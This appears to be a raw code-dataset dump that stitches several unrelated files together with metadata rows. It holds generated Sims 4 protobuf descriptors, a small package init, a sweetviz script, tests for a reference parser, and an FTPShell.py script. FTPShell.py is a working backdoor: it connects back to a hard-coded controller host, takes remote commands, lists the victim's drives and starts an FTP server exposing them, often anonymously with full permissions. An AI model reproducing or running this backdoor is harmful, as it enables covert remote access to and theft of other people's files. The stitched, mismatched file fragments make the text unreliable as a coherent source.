has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='loser_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.loser_ids',
index=1,
number=2,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.digest',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6455,
serialized_end=6542)
_SOCIALCGDIGESTMESSAGE = descriptor.Descriptor(name='SocialCGDigestMessage',
full_name='EA.Sims4.Network.SocialCGDigestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCGDigestMessage.challenge',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCGDigestMessage.candidates',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6544,
serialized_end=6660)
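# The Descriptor constructor cannot resolve cross references between message
# and enum types (message_type / enum_type were left as None above), so they
# are patched in here once every descriptor object exists, including types
# imported from Consts_pb2, Localization_pb2 and Exchange_pb2.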
_SOCIALGENERICRESPONSE.fields_by_name['msg_type'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALPLAYERINFOLIST_PLAYERINFO.fields_by_name['presence'].enum_type = Consts_pb2._ONLINEPRESENCESTATUS
_SOCIALPLAYERINFOLIST_PLAYERINFO.containing_type = _SOCIALPLAYERINFOLIST
_SOCIALPLAYERINFOLIST.fields_by_name['players'].message_type = _SOCIALPLAYERINFOLIST_PLAYERINFO
_SOCIALSEARCHMSG.fields_by_name['search_results'].message_type = Localization_pb2._LOCALIZEDSTRINGTOKEN
_SOCIALCASSANDRATEST.fields_by_name['opcode'].enum_type = Consts_pb2._CASSANDRATESTCODE
_SOCIALEXCHANGEMESSAGE.fields_by_name['envelope'].message_type = Exchange_pb2._EXCHANGESOCIALENVELOPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['feed_type'].enum_type = _SOCIALFEEDITEMTYPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['metadata'].message_type = Exchange_pb2._TRAYMETADATA
_SOCIALFEEDITEMMESSAGE.fields_by_name['followers_blob'].message_type = _SOCIALFOLLOWERSMESSAGE
_SOCIALGETWALLCOMMENTSMESSAGE.fields_by_name['messages'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALPOSTWALLCOMMENTMESSAGE.fields_by_name['message'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['messages'].message_type = _SOCIALFEEDITEMMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['unserialized_messages'].message_type = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO.containing_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE.fields_by_name['player_info_list'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO
_SOCIALCONTROLMESSAGE.fields_by_name['opcode'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['subop'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['getwallcommentsmsg'].message_type = _SOCIALGETWALLCOMMENTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['postwallcommentmsg'].message_type = _SOCIALPOSTWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['deletewallcommentmsg'].message_type = _SOCIALDELETEWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['friendmsg'].message_type = _SOCIALFRIENDMSG
_SOCIALCONTROLMESSAGE.fields_by_name['genericresponse'].message_type = _SOCIALGENERICRESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['playerinfo'].message_type = _SOCIALPLAYERINFOLIST
_SOCIALCONTROLMESSAGE.fields_by_name['feedsubmsg'].message_type = Exchange_pb2._SOCIALFEEDSUBMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['searchresultmsg'].message_type = _SOCIALSEARCHMSG
_SOCIALCONTROLMESSAGE.fields_by_name['inviteresponsemsg'].message_type = _SOCIALINVITERESPONSEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['originerror'].message_type = _ORIGINERRORMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialcassandratest'].message_type = _SOCIALCASSANDRATEST
_SOCIALCONTROLMESSAGE.fields_by_name['socialfriendlistrequestmsg'].message_type = _SOCIALFRIENDLISTREQUESTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestnucleusidfrompersona'].message_type = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
_SOCIALCONTROLMESSAGE.fields_by_name['socialnucleusidfrompersonaresponse'].message_type = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['socialexchangemessage'].message_type = _SOCIALEXCHANGEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestfeedwallmessage'].message_type = _SOCIALREQUESTFEEDWALLMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['stat_tickers'].message_type = Exchange_pb2._EXCHANGESTATTICKERMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['comment_petition_msg'].message_type = _SOCIALCOMMENTPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['feedremovalmsg'].message_type = _SOCIALFEEDREMOVALMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['bio_petition_msg'].message_type = _SOCIALBIOPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['fb_event_msg'].message_type = _SOCIALFACEBOOKEVENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestfollowers_msg'].message_type = _SOCIALREQUESTFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['responsefollowers_msg'].message_type = Exchange_pb2._SOCIALRESPONSEFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestignorelist_msg'].message_type = _SOCIALREQUESTIGNORELISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['response_player_info_list_msg'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['player_identification_list_msg'].message_type = Exchange_pb2._SERVERPLAYERIDENTIFICATIONLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['candidate_msg'].message_type = _SOCIALCANDIDATESMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['evaluation_results_msg'].message_type = _SOCIALEVALUATIONRESULTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['cg_update_msg'].message_type = Exchange_pb2._SOCIALCGUPDATEMESSAGE
_SOCIALCONTROLQUEUEBROADCASTMESSAGE.fields_by_name['control'].message_type = _SOCIALCONTROLMESSAGE
_SOCIALCANDIDATESMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
_SOCIALCGDIGESTMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
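# Register every top-level message descriptor on the file descriptor so
# reflection can look each one up by its unqualified name.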
DESCRIPTOR.message_types_by_name['SocialFriendMsg'] = _SOCIALFRIENDMSG
DESCRIPTOR.message_types_by_name['SocialPersonaResponseMsg'] = _SOCIALPERSONARESPONSEMSG
DESCRIPTOR.message_types_by_name['SocialGenericResponse'] = _SOCIALGENERICRESPONSE
DESCRIPTOR.message_types_by_name['SocialPlayerInfoList'] = _SOCIALPLAYERINFOLIST
DESCRIPTOR.message_types_by_name['SocialSearchMsg'] = _SOCIALSEARCHMSG
DESCRIPTOR.message_types_by_name['OriginErrorMessage'] = _ORIGINERRORMESSAGE
DESCRIPTOR.message_types_by_name['SocialInviteResponseMessage'] = _SOCIALINVITERESPONSEMESSAGE
DESCRIPTOR.message_types_by_name['SocialCassandraTest'] = _SOCIALCASSANDRATEST
DESCRIPTOR.message_types_by_name['SocialFriendListRequestMessage'] = _SOCIALFRIENDLISTREQUESTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestNucleusIdFromPersona'] = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
DESCRIPTOR.message_types_by_name['SocialNucleusIdFromPersonaResponse'] = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
DESCRIPTOR.message_types_by_name['SocialExchangeMessage'] = _SOCIALEXCHANGEMESSAGE
DESCRIPTOR.message_types_by_name['SocialFollowersMessage'] = _SOCIALFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemMessage'] = _SOCIALFEEDITEMMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemUnserializedMessage'] = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
DESCRIPTOR.message_types_by_name['SocialWallCommentMessage'] = _SOCIALWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetWallCommentsMessage'] = _SOCIALGETWALLCOMMENTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialPostWallCommentMessage'] = _SOCIALPOSTWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialDeleteWallCommentMessage'] = _SOCIALDELETEWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFeedWallMessage'] = _SOCIALREQUESTFEEDWALLMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFollowersMessage'] = _SOCIALREQUESTFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestIgnoreListMessage'] = _SOCIALREQUESTIGNORELISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetPlayerInfoListMessage'] = _SOCIALGETPLAYERINFOLISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCommentPetitionMessage'] = _SOCIALCOMMENTPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialBioPetitionMessage'] = _SOCIALBIOPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedRemovalMessage'] = _SOCIALFEEDREMOVALMESSAGE
DESCRIPTOR.message_types_by_name['SocialControlMessage'] = _SOCIALCONTROLMESSAGE
DESCRIPTOR.message_types_by_name['SocialInvalidateMsg'] = _SOCIALINVALIDATEMSG
DESCRIPTOR.message_types_by_name['SocialControlQueueBroadcastMessage'] = _SOCIALCONTROLQUEUEBROADCASTMESSAGE
DESCRIPTOR.message_types_by_name['LifeEventMessage'] = _LIFEEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialFacebookEventMessage'] = _SOCIALFACEBOOKEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidateStatisticSubmessage'] = _SOCIALCANDIDATESTATISTICSUBMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidatesMessage'] = _SOCIALCANDIDATESMESSAGE
DESCRIPTOR.message_types_by_name['SocialEvaluationResultsMessage'] = _SOCIALEVALUATIONRESULTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialCGDigestMessage'] = _SOCIALCGDIGESTMESSAGE
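# The concrete message classes below are synthesized by the
# reflection.GeneratedProtocolMessageType metaclass: each class body only
# names its DESCRIPTOR, and the metaclass attaches the field properties and
# the standard message API (Clear, CopyFrom, SerializeToString,
# ParseFromString, ...). A minimal usage sketch, assuming this generated
# module is importable as Social_pb2 (the actual module name is not shown
# in this excerpt):
#
#   msg = Social_pb2.SocialWallCommentMessage()
#   msg.author_id = 12345
#   msg.message = 'hello'
#   wire = msg.SerializeToString()
#   round_tripped = Social_pb2.SocialWallCommentMessage()
#   round_tripped.ParseFromString(wire)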
class SocialFriendMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALFRIENDMSG
class SocialPersonaResponseMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALPERSONARESPONSEMSG
class SocialGenericResponse(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALGENERICRESPONSE
class SocialPlayerInfoList(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  class PlayerInfo(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
    DESCRIPTOR = _SOCIALPLAYERINFOLIST_PLAYERINFO
  DESCRIPTOR = _SOCIALPLAYERINFOLIST
class SocialSearchMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALSEARCHMSG
class OriginErrorMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _ORIGINERRORMESSAGE
class SocialInviteResponseMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALINVITERESPONSEMESSAGE
class SocialCassandraTest(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALCASSANDRATEST
class SocialFriendListRequestMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALFRIENDLISTREQUESTMESSAGE
class SocialRequestNucleusIdFromPersona(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
class SocialNucleusIdFromPersonaResponse(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
class SocialExchangeMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALEXCHANGEMESSAGE
class SocialFollowersMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALFOLLOWERSMESSAGE
class SocialFeedItemMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALFEEDITEMMESSAGE
class SocialFeedItemUnserializedMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
class SocialWallCommentMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALWALLCOMMENTMESSAGE
class SocialGetWallCommentsMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALGETWALLCOMMENTSMESSAGE
class SocialPostWallCommentMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALPOSTWALLCOMMENTMESSAGE
class SocialDeleteWallCommentMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALDELETEWALLCOMMENTMESSAGE
class SocialRequestFeedWallMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALREQUESTFEEDWALLMESSAGE
class SocialRequestFollowersMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALREQUESTFOLLOWERSMESSAGE
class SocialRequestIgnoreListMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALREQUESTIGNORELISTMESSAGE
class SocialGetPlayerInfoListMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  class PlayerInfo(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
    DESCRIPTOR = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO
  DESCRIPTOR = _SOCIALGETPLAYERINFOLISTMESSAGE
class SocialCommentPetitionMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALCOMMENTPETITIONMESSAGE
class SocialBioPetitionMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALBIOPETITIONMESSAGE
class SocialFeedRemovalMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALFEEDREMOVALMESSAGE
class SocialControlMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALCONTROLMESSAGE
class SocialInvalidateMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALINVALIDATEMSG
class SocialControlQueueBroadcastMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALCONTROLQUEUEBROADCASTMESSAGE
class LifeEventMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _LIFEEVENTMESSAGE
class SocialFacebookEventMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALFACEBOOKEVENTMESSAGE
class SocialCandidateStatisticSubmessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALCANDIDATESTATISTICSUBMESSAGE
class SocialCandidatesMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALCANDIDATESMESSAGE
class SocialEvaluationResultsMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALEVALUATIONRESULTSMESSAGE
class SocialCGDigestMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
  DESCRIPTOR = _SOCIALCGDIGESTMESSAGE | 31.050625 | 10,693 | 0.763723 | 5,350 | 0.053839 | 0 | 0 | 0 | 0 | 0 | 0 | 27,127 | 0.272987 |
5f9ec6c74b57542c9787a229e40967ba3e06098c | 56 | py | Python | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | __all__ = ["NumpyUtility"]
from .NumpyUtility import *
| 14 | 27 | 0.732143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.25 |
5f9f9ecefb3439db4ca570e4a61b0846cf1331d6 | 188 | py | Python | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | 1 | 2021-01-10T12:06:26.000Z | 2021-01-10T12:06:26.000Z | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | import sweetviz
import pandas as pd
if __name__ == '__main__':
df = pd.read_csv("BankChurners_clean.csv")
report = sweetviz.analyze(df, "Attrition_Flag")
report.show_html()
| 20.888889 | 51 | 0.707447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.265957 |
5fa0436f9f5d626cf4b365a484376d1f5343ee15 | 5,046 | py | Python | FTPShell/FTPShell.py | dsogo/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 17 | 2020-10-07T01:37:32.000Z | 2021-12-11T21:23:25.000Z | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | null | null | null | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 8 | 2020-09-22T03:14:51.000Z | 2022-03-07T16:03:24.000Z | from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from multiprocessing import Process
from pyftpdlib import servers
from time import sleep
from requests import get
import socket
import psutil
import win32api
# Al0nnso - 2019
# FTP Reverse Shell
# NOT TESTED WITH EXTERNAL NETWORKS
try:
ip = get('https://api.ipify.org').text
except:
ip='ERROR'
pass
ftp=None
server = None
disk = "\\"
address = ("0.0.0.0", 21)
user = None
host = '192.168.15.5'  # YOUR IP OR HOST
port = 443
def ftp_main(server, address, disk, user, s, ip):
print('FTP STARTING...')
try:
authorizer = DummyAuthorizer()
try:
try:
s.send('FTP starting...: {}'.format(ip).encode())
except:
pass
print('TRYING...')
if disk.isalpha():
disk = '{}:\\'.format(disk)
if user == None:
authorizer.add_anonymous(disk)
elif user == '/user':
authorizer.add_user('user', '404', disk, perm="elradfmwMT")
else:
authorizer.add_user(user, user, disk, perm="elradfmwMT")
except:
authorizer.add_anonymous("\\")
handler = FTPHandler
handler.authorizer = authorizer
address = ("0.0.0.0", 21)
server = servers.FTPServer(address, FTPHandler)
try:
s.send('[+] FTP server started on ftp://{}:21'.format(ip).encode())
except:
pass
server.serve_forever()
except Exception as e:
sleep(10)
        print('reconnecting...')
        try:
            s.send('reconnecting...'.encode())
        except:
            pass
        print(e)
        ftp_main(server, address, disk, user, s, ip)
def socketConn(ftp):
try:
global address, disk, user, host, port, server, ip
# server=None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('[+] Connected'.encode())
while True:
Fdata = s.recv(3000)
Fdata = Fdata.decode()
if len(Fdata) > 0 or Fdata == " ":
print(Fdata)
data = str(Fdata).split(" ")
if 'exit' in data[0].lower():
try:
ftp.terminate()
s.send('ftp closed'.encode())
except:
s.send('WTF exit?'.encode())
elif data[0].lower()=='ip' or data[0].lower()=='inf':
s.send(str(ip).encode())
elif data[0].lower()=='disk' or data[0].lower()=='d':#LIST DISK
try:
disks=None
disks=psutil.disk_partitions()
s.send(str(disks).replace(',','\n').encode())
except:
s.send('FAIL DISK'.encode())
elif data[0].lower()=='vol' or data[0].lower()=='v':#LIST VOL OF DISK
try:
drives = win32api.GetLogicalDriveStrings()
drives = drives.split('\000')[:-1]
s.send((str(drives).replace("\'","")).encode())
except Exception as e:
s.send('FAIL VOL: {}'.format(e).encode())
elif (data[0].lower() == 'start'):
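                    # Command syntax: start [-D <disk letter>] [-U <user>] [-A <bind address>],
                    # e.g. "start -D C -U admin".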
mode = data[0].lower()
print(len(data))
for i in range(len(data)):
print(str(i))
if mode == 'start' and '-D' in data[i].upper():
if data[i + 1].isalpha():
disk = data[i + 1].upper()
s.send('DISK: {}'.format(disk).encode())
if mode == 'start' and '-U' in data[i].upper():
user = data[i + 1]
s.send('USER: {}'.format(user).encode())
if mode == 'start' and '-A' in data[i].upper():
addr = data[i + 1]
print('addr: {}'.format(addr))
try:
address = (addr, 21)
s.send('address: {}'.format(address).encode())
except:
s.send('fail to set addr...'.encode())
s.send(' '.encode())
if ftp!=None:
ftp.terminate()
s.send('ftp closed'.encode())
ftp = Process(target=ftp_main,args=(server, address, disk, user, s, ip))
ftp.start()
else:
s.send(' '.encode())
else:
s.send(' '.encode())
except Exception as e:
        print('Socket reconnection...')
print(e)
s = None
sleep(2)
socketConn(ftp)
if __name__ == '__main__':
socketConn(ftp)
| 35.535211 | 92 | 0.441538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 641 | 0.127031 |
5fa103b113b3be7f53cb7ec2e64ba88c2cf38693 | 8,321 | py | Python | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 13 | 2020-02-19T02:09:00.000Z | 2021-12-16T23:15:58.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 33 | 2020-02-12T11:21:51.000Z | 2022-02-10T00:48:17.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
import os
import pytest
from deep_reference_parser.io.io import (
read_jsonl,
write_jsonl,
load_tsv,
write_tsv,
_split_list_by_linebreaks,
_unpack,
)
from deep_reference_parser.reference_utils import yield_token_label_pairs
from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV
@pytest.fixture(scope="module")
def tmpdir(tmpdir_factory):
return tmpdir_factory.mktemp("data")
def test_unpack():
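    # _unpack transposes a list of (tokens, labels) pairs into a pair of
    # (all token sequences, all label sequences), as the fixtures below show.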
before = [
(
("token0", "token1", "token2", "token3"),
("label0", "label1", "label2", "label3")
),
(
("token0", "token1", "token2"),
("label0", "label1", "label2")
),
]
expected = [
(
("token0", "token1", "token2", "token3"),
("token0", "token1", "token2"),
),
(
("label0", "label1", "label2", "label3"),
("label0", "label1", "label2")
),
]
actual = _unpack(before)
assert expected == actual
def test_write_tsv(tmpdir):
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
token_label_tuples = list(yield_token_label_pairs(expected[0], expected[1]))
PATH = os.path.join(tmpdir, "test_tsv.tsv")
write_tsv(token_label_tuples, PATH)
actual = load_tsv(os.path.join(PATH))
assert expected == actual
def test_load_tsv_train():
"""
Text of TEST_TSV_TRAIN:
```
the i-r
focus i-r
in i-r
Daloa i-r
, i-r
Côte i-r
d’Ivoire]. i-r
Bulletin i-r
de i-r
la i-r
Société i-r
de i-r
Pathologie i-r
Exotique i-r
et i-r
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
actual = load_tsv(TEST_TSV_TRAIN)
assert len(actual[0][0]) == len(expected[0][0])
assert len(actual[0][1]) == len(expected[0][1])
assert len(actual[0][2]) == len(expected[0][2])
assert len(actual[1][0]) == len(expected[1][0])
assert len(actual[1][1]) == len(expected[1][1])
assert len(actual[1][2]) == len(expected[1][2])
assert actual == expected
def test_load_tsv_predict():
"""
Text of TEST_TSV_PREDICT:
```
the
focus
in
Daloa
,
Côte
d’Ivoire].
Bulletin
de
la
Société
de
Pathologie
Exotique
et
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
)
actual = load_tsv(TEST_TSV_PREDICT)
assert actual == expected
def test_load_tsv_train_multiple_labels():
"""
    Text of TEST_LOAD_TSV:
```
the i-r a
focus i-r a
in i-r a
Daloa i-r a
, i-r a
Côte i-r a
d’Ivoire]. i-r a
Bulletin i-r a
de i-r a
la i-r a
Société i-r a
de i-r a
Pathologie i-r a
Exotique i-r a
et i-r a
token
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
(
("a", "a", "a", "a", "a", "a", "a"),
("a", "a", "a", "a", "a", "a"),
("a", "a"),
),
)
actual = load_tsv(TEST_LOAD_TSV)
assert actual == expected
def test_yield_token_label_pairs():
tokens = [
[],
["the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."],
["Bulletin", "de", "la", "Société", "de", "Pathologie"],
["Exotique", "et"],
]
labels = [
[],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r"],
]
expected = [
(None, None),
("the", "i-r"),
("focus", "i-r"),
("in", "i-r"),
("Daloa", "i-r"),
(",", "i-r"),
("Côte", "i-r"),
("d’Ivoire].", "i-r"),
(None, None),
("Bulletin", "i-r"),
("de", "i-r"),
("la", "i-r"),
("Société", "i-r"),
("de", "i-r"),
("Pathologie", "i-r"),
(None, None),
("Exotique", "i-r"),
("et", "i-r"),
(None, None),
]
actual = list(yield_token_label_pairs(tokens, labels))
assert expected == actual
def test_read_jsonl():
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
